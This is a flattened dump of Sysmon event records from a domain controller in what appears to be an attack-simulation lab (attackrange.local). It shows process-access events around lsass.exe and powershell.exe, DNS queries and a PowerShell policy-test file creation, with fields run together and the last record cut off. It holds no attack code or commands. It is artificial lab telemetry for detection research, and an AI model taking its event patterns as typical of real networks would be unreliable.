13:33:20.997{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.256{59A5CD1D-8E21-6005-D502-00000000A201}4220localhost0127.0.0.1;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.027{59A5CD1D-8E15-6005-B802-00000000A201}4560f.f.f.f.f.b.1.0.b.2.e.3.0.5.8.c.0.0.0.0.0.0.0.0.e.0.1.0.0.0.a.0.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.824{59A5CD1D-8E15-6005-B802-00000000A201}45605.8.f.0.0.c.5.8.0.0.0.0.4.5.4.d.5.1.f.f.0.2.4.2.c.f.0.0.0.0.0.e.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.809{59A5CD1D-8E15-6005-B802-00000000A201}45603.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.9003-C:\Windows\sysmon64.exe 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.310{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.310{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.294{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.294{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.294{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.263{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_s0baoo0u.xcr.ps12021-01-18 13:33:22.263 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.232{59A5CD1D-8E22-6005-DB02-00000000A201}24481708C:\Windows\system32\conhost.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 